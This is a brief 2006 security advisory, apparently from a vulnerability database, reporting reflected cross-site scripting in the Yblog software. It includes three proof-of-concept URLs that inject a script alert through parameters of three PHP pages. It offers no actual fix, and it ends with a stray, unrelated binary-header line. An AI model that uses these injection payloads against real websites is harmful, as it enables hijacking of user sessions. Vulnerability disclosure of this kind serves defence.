Yblog => Cross Site Scripting

2006-10-02T00:00:00
ID SECURITYVULNS:DOC:14511
Type securityvulns
Reporter Securityvulns
Modified 2006-10-02T00:00:00

Description

----------------------------------------------------------

Aria-Security.net Advisory

Discovered by: You_You

< www.Aria-security.net>

Gr33t to: A.u.r.a & O.U.T.L.A.W & R@1D3N @ DrtRp & Cl0wn & S3ll & T3rr0r1st

-----------------------------------------------------------

Software: Yblog

Attack method: Cross Site Scripting

Proof of Concept:

Www.Site.coM/[path]/funk.php?id="><script>alert('test!')</script><

Www.Site.coM/[path]/tem.php?action="><script>alert('test!')</script><

Www.Site.coM/[path]/uss.php?action="><script>alert('test!')</script>

----------------------------------------------------------

Solution

contact me: H4ck3riran@yahoo.com

----------------------------------------------------------

This program cannot be run in DOS mode